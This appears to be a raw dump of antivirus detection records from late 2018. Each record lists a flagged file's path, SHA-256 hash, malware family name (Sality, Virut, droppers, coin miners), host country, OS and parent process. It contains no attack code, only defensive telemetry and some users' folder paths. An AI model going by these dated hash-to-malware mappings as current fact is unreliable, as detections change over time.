  Row(detection=Row(filename='266fcf3fe263c9da3765e88132c1ce68baf0cb01ee835ebc1a35fffbc15000df', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\266FCF3FE263C9DA3765E88132C1CE68BAF0CB01EE835EBC1A35FFFBC15000DF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='266fcf3fe263c9da3765e88132c1ce68baf0cb01ee835ebc1a35fffbc15000df', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:04:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-171408-49cd9b4c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2909a85d\\AVSCAN-20181101-171335-4210727E\\AVSCAN-20181101-171408-49CD9B4C', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='package_764_xml.js.zip', filepath='C:\\dasi\\LwX\\server\\DConcept\\HtmlHelp\\XCONCEPT_HILFE\\WHXDATA\\PACKAGE_764_XML.JS.zip', filesize=4000, name='HEUR/Suspar.Gen.#M1.#R1'), hash='8172c85bfccbdf9b8fcf165c6ad31824535fc0ab9e28364d55d6fd67f60572d8', metadata=Row(cmdline='C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Documents\\\\\\\\PersBackup\\\\\\\\dasi.buj \\\\\\/force \\\\\\/speed:fast \\\\\\/mode:full', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Personal Backup 5\\Persbackup.exe', parentsize=10769920, timestamp='2018-11-01T23:24:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='11d5167e9542b2084638bfee2e987fe11f2201a4f746161fd3879aed097607ab', metadata=Row(cmdline=None, country='GA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=427520, timestamp='2018-11-01T01:54:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181026-164925-5f39e315', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a51c869\\AVSCAN-20181026-163602-D3450E23\\AVSCAN-20181026-164925-5F39E315', filesize=128000, name='W97M/Agent.06750161.#M1.#R1'), hash='70d7c2334ce913dde554ec5770a502c593f574eaad533574b432b16f5815a535', metadata=Row(cmdline=None, country='BG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:52:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-003341-814fd977', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-003341-814FD977', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:33:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-142901-39773750', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_97cd324c\\AVSCAN-20181101-142714-2BFE0BD0\\AVSCAN-20181101-142901-39773750', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-003342-d4f71ef5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9933c879\\AVSCAN-20181025-214701-39F5EF82\\AVSCAN-20181101-003342-D4F71EF5', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:33:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194608-c0d6a7fa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194605-C0532E3E\\AVSCAN-20181101-194608-C0D6A7FA', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:46:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='aria2c.exe', filepath='\\\\EDP-YBS\\MASTER\\Tools\\aria2c.exe', filesize=4544000, name='W32/Sality.AT.#M1.#R1'), hash='5b65993442c24dbeaf890348167c216b9400ab10de2cde8754a4d5f18fe2b126', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dwm.exe', parentsize=92672, timestamp='2018-11-01T04:05:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='qt5webenginecore.dll', filepath='D:\\steam\\steamapps\\common\\Trove\\Qt5WebEngineCore.dll', filesize=38528000, name='W32/Ramnit.CD.#M1.#R1'), hash='72d41b47726f9129dd59c62fdd4837d63b521cd38882b3e896e77a9aaa6b1860', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T14:38:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpk.dll', filepath='F:\\lpk.dll', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='6f6490513aa0a0973f442e7e27517de3e0b674eb76130922ebc27260d1682881', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2868224, timestamp='2018-11-01T09:07:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0c6d29e0a8e25675a99229dae0f71ac3080662470b52debea494b7de81ad9986.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0C6D29E0A8E25675A99229DAE0F71AC3080662470B52DEBEA494B7DE81AD9986.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0c6d29e0a8e25675a99229dae0f71ac3080662470b52debea494b7de81ad9986', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:15:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000b3936', filepath='C:\\Windows\\Temp\\tmp00000296\\tmp000b3936', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T10:54:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='561cc35c2337e602ede464a08f41dda28650cb754fb5c96bfb97e7326cdbd50e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\561CC35C2337E602EDE464A08F41DDA28650CB754FB5C96BFB97E7326CDBD50E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='561cc35c2337e602ede464a08f41dda28650cb754fb5c96bfb97e7326cdbd50e', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:14:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T06:10:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T21:16:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002353-419b68d2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002353-419B68D2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='optsatadc.dll', filepath='C:\\Windows\\SysWOW64\\optsatadc.dll', filesize=384000, name='TR/Crypt.XPACK.Gen.#M300.#R4115'), hash='5194361db8e41e027f5b835bdcfee155611cca6ec666e5605fcdc587ad1f27d4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002251-3ad48798', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-002012-29AB3F0F\\AVSCAN-20181102-002251-3AD48798', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:22:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmpevz2komo', filepath='/tmp/tmpevz2komo', filesize=128000, name='PUA/Outbrowse.Gen.#M1.#R1'), hash='555ac4eaff7b8bcf964d627b5e4a497896a066eda5217c2ef82796731722f600', metadata=Row(cmdline=None, country='IE', os_name='Linux', os_vmajor='8', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T16:19:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T07:47:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152741-cab43f40', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152741-CAB43F40', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:27:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='htdbm.exe', filepath='H:\\xampp\\apache\\bin\\htdbm.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='935a9f61557bc59de53e2260a99d29f4645109d101d40e4f12c0d1955c383125', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1716224, timestamp='2018-11-01T06:59:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='domanda di laurea.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\DOMANDA DI LAUREA\\DOMANDA DI LAUREA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:21:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='utenze.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\utenze.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\DEB710E7-BAB0-7891-9FA6-68327206E669\\Latest\\ccp.exe', filesize=244000, name='TR/Drop.Rotbrow.mcv.1.#M1.#R1'), hash='bb1e635aa88a6906473713bd49368553f49c21e885c1586742542b3fee4b405c', metadata=Row(cmdline='-Embedding', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Sony\\VAIO Care\\Auslogics\\AuslogicExeCOMServer.exe', parentsize=29888, timestamp='2018-11-01T11:17:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8 ;0u.exe', filepath='H:\\العاب\\القرصان\\المدفع الرشاش\\8 ;0u.exe', filesize=64000, name='HEUR/Patched.Ren.#M1.#R1'), hash='8f440aa781fc95ebaa72c716ee984fa9c71417c785478b8ff0b16dce075e61ea', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:35:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d2b55f9799a5e62708a35d9fcbd36b54cc79234a47a1079f1494707b505b6a6b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T23:30:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093346-83d75960', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093346-83D75960', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:33:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\k203exxfgnp\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline='\\\\\\/autorun \\\\\\/AdvanceScan', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare\\AutoCare.exe', parentsize=2541328, timestamp='2018-11-01T08:51:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='htccalc.exe', filepath='\\\\?\\C:\\Program Files (x86)\\Boxs Cracked 2015-2016\\AutoPlay\\Docs\\Volcano Tool\\bin\\HTCCALC.exe', filesize=3392000, name='W32/Sality.AT.#M1.#R1'), hash='dc89f8c174ad6632efaa2e672615d4c58372509964e57216b49356c82c73e1b5', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123150-25f57f79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_724d9224\\AVSCAN-20181101-123103-1C69917F\\AVSCAN-20181101-123150-25F57F79', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:31:51Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-234838-af4fe867', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-234838-AF4FE867', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-095133-5054fca0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-095133-5054FCA0', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:51:40Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='corso massaggiatore.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\corso massaggiatore.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:26:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tar.exe', filepath='C:\\Users\\X\\Desktop\\JUDGES\\Exes\\tar.exe', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='99d5d3daee62592a20d1e32dd290b9e19e3f7fc1756cb7c484382f033b2aad82', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:52:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150143-a011d569', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150143-A011D569', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='d3e11f8c6582a712117aabe43b2622a96bb4f9f5af2f6c9ee526e094ac80145a', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T07:14:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ccs pic c compiler pcwdh 4.114 full version .scr', filepath='H:\\ccs pic c compiler pcwdh 4.114 Full Version .scr', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='d2b9fdf0d1a4944e826fda5c155f6555f02be753ca74269c381a7d992c106a10', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:49:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='favorites.bat', filepath='C:\\Users\\X\\Favorites\\Favorites.bat', filesize=512000, name='TR/Drop.Agen.757760.#M1.#R1'), hash='be458c71411a96a3c8b0e010203665e37b3ec2700f94c837e24d0cf7b63cb5e1', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe12_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe12 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T08:39:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-150012-8eb23dac', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-150012-8EB23DAC', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:00:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-154639-d30bdca3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_52a04c1c\\AVSCAN-20181101-154627-D114C92D\\AVSCAN-20181101-154639-D30BDCA3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T07:46:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='precios.exe', filepath='C:\\EF3SRV\\Comunes\\SP15 - Club SAAS - SUNDECOP\\Club SAAS\\precios.exe', filesize=128000, name='W32/Alman.BB.#M1.#R1'), hash='27bc6957e7abb56f40bc3edb75c63a92f5ff913060e4d64a5acd538e66caa650', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe679_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe679 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-04T15:57:46Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000243e5', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000243e5', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:49:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-153725-da0acbb9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2b316d9b\\AVSCAN-20181104-145604-28DEF0E8\\AVSCAN-20181104-153725-DA0ACBB9', filesize=768000, name='WORM/Pimybot.JA.1.#M1.#R1'), hash='5cc1e61c072716b3441ffa86c7e63567559b222d6f7826a593b9793e5bd8d99c', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:37:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nilid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nilid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3acf7c1425fa9fe9629c4cdaf71a882083cd14a828265aa4a0a21ae3f083965b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T04:13:00Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp000192b1', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp000192b1', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:09:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T01:34:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0345336.exe', filepath='F:\\System Volume Information\\_restore{EC55BFD7-BEFF-42D8-9D76-6078D4869C8B}\\RP438\\A0345336.exe', filesize=116000, name='W32/Sality.AT.#M1.#R1'), hash='ab257ba57ad491fd1817addd8392e913d929e398ddfb850bd7b4e60a1ff85b7c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVG\\Antivirus\\AVGSvc.exe', parentsize=325072, timestamp='2018-11-04T10:40:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140300-f44b77d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_10bae96c\\AVSCAN-20181104-140204-EA8B75B2\\AVSCAN-20181104-140300-F44B77D0', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T09:10:51Z'), dt=datetime.date(2018, 11, 4)),
